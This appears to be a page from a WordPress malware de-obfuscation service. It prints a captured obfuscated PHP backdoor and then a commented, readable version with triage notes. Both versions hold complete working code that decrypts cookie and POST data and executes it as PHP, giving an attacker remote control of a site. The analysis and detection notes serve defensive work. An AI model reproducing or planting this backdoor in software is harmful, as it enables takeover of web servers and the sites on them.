De-obfuscate PHP malware, viruses and tampering code found on WordPress sites back into readable code.
*Please note that not all obfuscation codes can be decoded.<?php
// Obfuscated sample, kept exactly as captured so it can still be matched against files on disk.
//
// Obfuscation technique: every function name and constant is spelled one character at a
// time by indexing into the alphabet string $wektlf, and the results are collected in the
// table $rqnnqg. Names such as create_function therefore never appear literally in the
// file, so a plain string search for them will not find it.
//
// Table contents once resolved (they match the de-obfuscated listing on this page):
//   [0] "H*"  [1] create_function  [2] b3924e63-cd64-4c86-9d24-117db57673f0  [3] "#"
//   [4] count  [5] str_repeat  [6] explode  [7] substr  [8] array_merge  [9] strlen  [10] pack
//
// Behaviour: for each cookie and POST field, the value is hex-decoded (hiecap), XORed with a
// repeating key built from the field name plus the hard-coded string in [2] (hcspfuu), and
// split on "#". When the number of parts is a multiple of 3, uemswbg calls the function named
// by part 1 on part 2, runs the result as PHP code through create_function, and exits.
// In short: request data is decoded and executed, which makes this file a backdoor.
//
// Triage notes: static indicators visible here are the alphabet string, the hard-coded string
// in [2] and the three function names. The identifiers look machine-generated and presumably
// differ between samples, so prefer matching on the structure (character-indexed string table
// feeding a dynamic call on $_COOKIE/$_POST data) over the names alone.
$wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d';$rqnnqg = Array();$rqnnqg[] = $wektlf[33].$wektlf[21];$rqnnqg[] = $wektlf[32].$wektlf[23].$wektlf[14].$wektlf[6].$wektlf[18].$wektlf[14].$wektlf[24].$wektlf[5].$wektlf[31].$wektlf[0].$wektlf[32].$wektlf[18].$wektlf[20].$wektlf[10].$wektlf[0];$rqnnqg[] = $wektlf[28].$wektlf[19].$wektlf[9].$wektlf[13].$wektlf[35].$wektlf[14].$wektlf[3].$wektlf[19].$wektlf[15].$wektlf[32].$wektlf[36].$wektlf[3].$wektlf[35].$wektlf[15].$wektlf[35].$wektlf[32].$wektlf[11].$wektlf[3].$wektlf[15].$wektlf[9].$wektlf[36].$wektlf[13].$wektlf[35].$wektlf[15].$wektlf[16].$wektlf[16].$wektlf[17].$wektlf[36].$wektlf[28].$wektlf[25].$wektlf[17].$wektlf[3].$wektlf[17].$wektlf[19].$wektlf[5].$wektlf[4];$rqnnqg[] = $wektlf[34];$rqnnqg[] = $wektlf[32].$wektlf[10].$wektlf[31].$wektlf[0].$wektlf[18];$rqnnqg[] = $wektlf[26].$wektlf[18].$wektlf[23].$wektlf[24].$wektlf[23].$wektlf[14].$wektlf[27].$wektlf[14].$wektlf[6].$wektlf[18];$rqnnqg[] = $wektlf[14].$wektlf[7].$wektlf[27].$wektlf[29].$wektlf[10].$wektlf[36].$wektlf[14];$rqnnqg[] = $wektlf[26].$wektlf[31].$wektlf[28].$wektlf[26].$wektlf[18].$wektlf[23];$rqnnqg[] = $wektlf[6].$wektlf[23].$wektlf[23].$wektlf[6].$wektlf[22].$wektlf[24].$wektlf[12].$wektlf[14].$wektlf[23].$wektlf[1].$wektlf[14];$rqnnqg[] = $wektlf[26].$wektlf[18].$wektlf[23].$wektlf[29].$wektlf[14].$wektlf[0];$rqnnqg[] = $wektlf[27].$wektlf[6].$wektlf[32].$wektlf[2];foreach ($rqnnqg[8]($_COOKIE, $_POST) as $qqzid => $nnkka){function hcspfuu($rqnnqg, $qqzid, $wgjfh){return $rqnnqg[7]($rqnnqg[5]($qqzid . 
$rqnnqg[2], ($wgjfh / $rqnnqg[9]($qqzid)) + 1), 0, $wgjfh);}function hiecap($rqnnqg, $cmtmu){return @$rqnnqg[10]($rqnnqg[0], $cmtmu);}function uemswbg($rqnnqg, $cmtmu){$uhvzpub = $rqnnqg[4]($cmtmu) % 3;if (!$uhvzpub) {$vgosji = $rqnnqg[1]; $actrtk = $vgosji("", $cmtmu[1]($cmtmu[2]));$actrtk();exit();}}$nnkka = hiecap($rqnnqg, $nnkka);uemswbg($rqnnqg, $rqnnqg[6]($rqnnqg[3], $nnkka ^ hcspfuu($rqnnqg, $qqzid, $rqnnqg[9]($nnkka))));}
<?php
// De-obfuscated form of the sample: the character-by-character string building has been
// folded into literals, which exposes the function names the code calls indirectly.
// Summary: every cookie and POST field is hex-decoded, XOR-decrypted and, if it splits into
// a multiple of three "#"-separated parts, turned into PHP code and executed. A file with
// this logic is a request-driven backdoor and indicates the site has been compromised;
// deleting the file does not by itself address how it got there.

// Alphabet the obfuscated original indexed into; here only index 34 ("#") is still read.
$wektlf = 'ngk60fax\'9o8m2e-17t3i*yr_5spblvucH#4d';

// Lookup table of constants and function names, always called as $rqnnqg[n](...).
$rqnnqg = array();
$rqnnqg[] = "H*";                                   // [0] pack() format: hex string, high nibble first
$rqnnqg[] = "create_function";                      // [1] builds a function from a code string (eval-like)
$rqnnqg[] = "b3924e63-cd64-4c86-9d24-117db57673f0"; // [2] hard-coded string appended to the field name as XOR key material
$rqnnqg[] = $wektlf[34];                            // [3] "#", the separator between decoded parts
$rqnnqg[] = "count";                                // [4]
$rqnnqg[] = "str_repeat";                           // [5]
$rqnnqg[] = "explode";                              // [6]
$rqnnqg[] = "substr";                               // [7]
$rqnnqg[] = "array_merge";                          // [8]
$rqnnqg[] = "strlen";                               // [9]
$rqnnqg[] = "pack";                                 // [10]

// Every cookie and every POST field is a candidate carrier; $qqzid is the field name and
// $nnkka its value. With array_merge, a POST field replaces a cookie of the same name.
// NOTE(review): cookies and POST bodies are usually absent from default web access logs, so
// a lack of suspicious log lines does not show the backdoor was unused. Confirm what the
// server actually logs.
foreach (array_merge($_COOKIE, $_POST) as $qqzid => $nnkka) {
    // NOTE(review): the three functions below are declared inside the loop body, so a second
    // iteration would presumably stop with PHP's "Cannot redeclare" fatal error. If so, error
    // log entries naming hcspfuu would be a useful indicator. Confirm on the affected PHP version.

    // Keystream: repeat (field name . $rqnnqg[2]) often enough to cover $wgjfh bytes, then
    // truncate to exactly $wgjfh bytes with substr().
    function hcspfuu($rqnnqg, $qqzid, $wgjfh) {
        return $rqnnqg[7]($rqnnqg[5]($qqzid . $rqnnqg[2], $wgjfh / $rqnnqg[9]($qqzid) + 1), 0, $wgjfh);
    }

    // Hex-decode: pack("H*", $cmtmu). The @ hides the warnings that ordinary, non-hex
    // cookie and form values would otherwise raise.
    function hiecap($rqnnqg, $cmtmu) {
        return @$rqnnqg[10]($rqnnqg[0], $cmtmu);
    }

    // Execution stage. $cmtmu is the array produced by explode("#", ...).
    function uemswbg($rqnnqg, $cmtmu) {
        // Gate: continue only when the number of parts is a multiple of 3.
        $uhvzpub = $rqnnqg[4]($cmtmu) % 3;
        if (!$uhvzpub) {
            $vgosji = $rqnnqg[1];
            // Part 1 names a function, part 2 is its argument; the return value becomes the
            // body of a parameterless function created with create_function().
            // Both come from the request, so this is arbitrary code execution.
            // create_function() was removed in PHP 8.0, so this call only succeeds on older PHP.
            $actrtk = $vgosji("", $cmtmu[1]($cmtmu[2]));
            $actrtk();
            // Stop here so the normal page is not rendered after the injected code runs.
            exit;
        }
    }

    // Hex-decode the value, XOR it with a keystream of the same length, split on "#",
    // and hand the parts to the execution stage.
    $nnkka = hiecap($rqnnqg, $nnkka);
    uemswbg($rqnnqg, $rqnnqg[6]($rqnnqg[3], $nnkka ^ hcspfuu($rqnnqg, $qqzid, $rqnnqg[9]($nnkka))));
}